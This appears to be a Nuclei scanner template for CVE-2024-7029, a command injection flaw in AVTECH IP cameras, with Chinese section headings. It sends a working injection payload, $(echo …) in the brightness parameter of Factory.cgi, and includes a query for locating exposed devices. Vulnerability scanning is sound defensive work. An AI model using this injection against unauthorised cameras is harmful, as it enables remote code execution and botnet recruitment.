漏洞描述
The endpoint `/cgi-bin/supervisor/Factory.cgi` is vulnerable to command injection via the `action` parameter, allowing remote code execution.
CVE-2024-7029: AVTECH IP Camera - Command Injection
PoC代码[已公开]
id: CVE-2024-7029
info:
name: AVTECH IP Camera - Command Injection
author: DhiyaneshDK
severity: high
description: |
The endpoint `/cgi-bin/supervisor/Factory.cgi` is vulnerable to command injection via the `action` parameter, allowing remote code execution.
reference:
- https://www.akamai.com/blog/security-research/2024-corona-mirai-botnet-infects-zero-day-sirt
- https://www.cisa.gov/news-events/ics-advisories/icsa-24-214-07
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/Ostorlab/KEV
- https://github.com/bigherocenter/CVE-2024-7029-EXPLOIT/blob/main/CVE-2024-7029.py
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2024-7029
cwe-id: CWE-77
epss-score: 0.9286
epss-percentile: 0.99758
metadata:
verified: true
max-request: 1
fofa-query: body="AVTECH Software"
tags: cve,cve2024,avtech,rce,intrusive,vkev
variables:
string: "{{randstr}}"
http:
- raw:
- |
POST /cgi-bin/supervisor/Factory.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=white_led&brightness=$(echo%20{{string}}+2>&1)
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{string}}"
- type: word
negative: true
part: body
words:
- "echo%20{{string}}"
- "echo {{string}}"
- type: word
part: content_type
words:
- "text/plain"
- type: status
status:
- 200
# digest: 4a0a00473045022100b229a6a4dad20f0363150be3aebc9ee057142557b1570c135699f3b67a21ccf902204e9b601c1976259aa2082b93345dfb4e4478aa61ccec44ff67c4806f8a14a8b4:922c64590222798bb761d5b6d8e72950